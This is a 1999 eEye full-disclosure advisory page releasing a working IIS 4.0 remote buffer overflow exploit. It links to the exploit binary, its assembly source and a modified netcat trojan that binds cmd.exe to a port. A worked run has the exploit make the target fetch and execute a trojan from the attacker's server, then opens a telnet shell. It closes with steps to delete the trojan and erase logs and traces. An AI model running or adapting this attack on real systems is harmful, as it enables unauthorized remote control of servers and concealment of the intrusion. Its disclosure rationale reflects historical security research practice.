retina.vs.iis4-round2-the.exploit.txt

`http://www.eeye.com/database/advisories/ad06081999/ad06081999-exploit.html  
  
  
Retina vs. IIS4, Round 2 - The Exploit  
  
We contemplated releasing this exploit and decided to do it.   
  
Here Is Why.  
  
We are a full disclosure security team, and we were not working under any non  
disclosure agreements with anyone. Our responsibility to our clients and the whole  
network community is to disclose as many details as possible, this is how other  
developers can pick up where we stopped and explore the exploit in different  
directions, this is the way we can contribute to the security community and keep  
software vendors working hard at producing more robust products. This exploit  
demonstrates the seriousness of the hole, YES this is a very serious hole and  
needs to be given the attention it deserves. If our team starts hiding the facts,  
we'll be no better than a software vendor that rushes insecure products to  
market. So here it goes...   
  
The Target:  
  
Lets say for this example we are targeting some random fortune 500 company.  
Take your pick. We want to pretend this company has some "state of the art"  
security. They are locked down behind a Cisco Pix, and are being watched with the  
best of Intrusion Detection software. The server only allows inbound connections  
to port 80.  
  
Let's Dance.  
  
We've crafted our exploit to overflow the remote machine and download and  
execute a trojan from our web server. The trojan we are using for this example is,  
ncx.exe. Ncx.exe is a hacked up version of netcat.exe. The hacked up part of this  
netcat is that it always passes -l -p 80 -t -e cmd.exe as its argument. That  
basically means netcat is always going to bind cmd.exe to port 80. The exe has  
also been packed slightly to make it smaller. Instead of a 50k footprint its 31k. So  
we run our exploit:  
  
  
Downloads: iishack.exe <http://www.eeye.com/database/advisories/ad06081999/iishack.exe>  
iishack.asm <http://www.eeye.com/database/advisories/ad06081999/iishack.asm>  
ncx.exe (Port 80) <http://www.eeye.com/database/advisories/ad06081999/ncx.exe>  
ncx99.exe (Port 99) <http://www.eeye.com/database/advisories/ad06081999/ncx99.exe>  
  
We have had reports of people not being able to duplicate the exploit on their   
server. The reason for this is ncx.exe is trying to bind to port 80 before   
inetinfo.exe has exited. We have made another version of ncx to bind to port 99   
(ncx99.exe) therefore fixing the problem. The exploit should work on any sp4 or   
sp5 machine. We have not tested against sp3 machines and would love to know if   
it works or not. Let us know. [email protected]   
  
  
X:\Code>iishack example.com 80 ourserver.com/ncx.exe  
------(IIS 4.0 remote buffer overflow exploit)-----------------  
(c) dark spyrit -- [email protected].  
http://www.eEye.com  
  
[usage: iishack <host> <port> <url> ]  
eg - iishack www.example.com 80 www.myserver.com/thetrojan.exe  
do not include 'http://' before hosts!  
---------------------------------------------------------------  
  
Data sent!  
  
Note: Give it enough time to download your trojan.  
  
X:\Code>telnet example.com 80  
  
Microsoft(R) Windows NT(TM)  
(C) Copyright 1985-1996 Microsoft Corp.  
  
C:\>[You have full access to the system, happy browsing :)]  
C:\>[Add a scheduled task to restart inetinfo in X minutes]  
C:\>[Add a scheduled task to delete ncx.exe in X-1 minutes]  
C:\>[Clean up any trace or logs we might have left behind.]  
C:\>exit  
  
Note: Once we type exit in the telnet session our trojan exe, ncx.exe is unloaded and is no longer listening on port  
80. Therefore the web service can restart and everything can seem back to normal. Now the example above was a  
some what quick demonstration of how this could be used. Some things were left out because this advisory is big  
enough as it is.  
  
  
Special Thanks  
  
Goes to professor [email protected] for coding this exploit and demonstrating his  
Kung Fu style.  
  
Copyright (c) 1999 eEye Digital Security Team  
  
Permission is hereby granted for the redistribution of this alert   
electronically. It is not to be edited in any way without express consent of eEye. If  
you wish to reprint the whole or any part of this alert in any other medium  
excluding electronic medium, please e-mail [email protected] for permission.  
  
Disclaimer:  
  
The information within this paper may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There are NO  
warranties with regard to this information.   
In no event shall the author be liable for any damages whatsoever arising out of or  
in connection with the use or spread of this information. Any use of this  
information is at the user's own risk.  
  
Please send suggestions, updates, and comments to:   
  
eEye Digital Security Team  
  
[email protected]   
www.eEye.com   
  
Retina vs. IIS4, Round 2  
<http://www.eeye.com/database/advisories/ad06081999/ad06081999.html>  
Retina vs. IIS4, Round 2 - The Brain  
<http://www.eeye.com/database/advisories/ad06081999/ad06081999-brain.html>  
`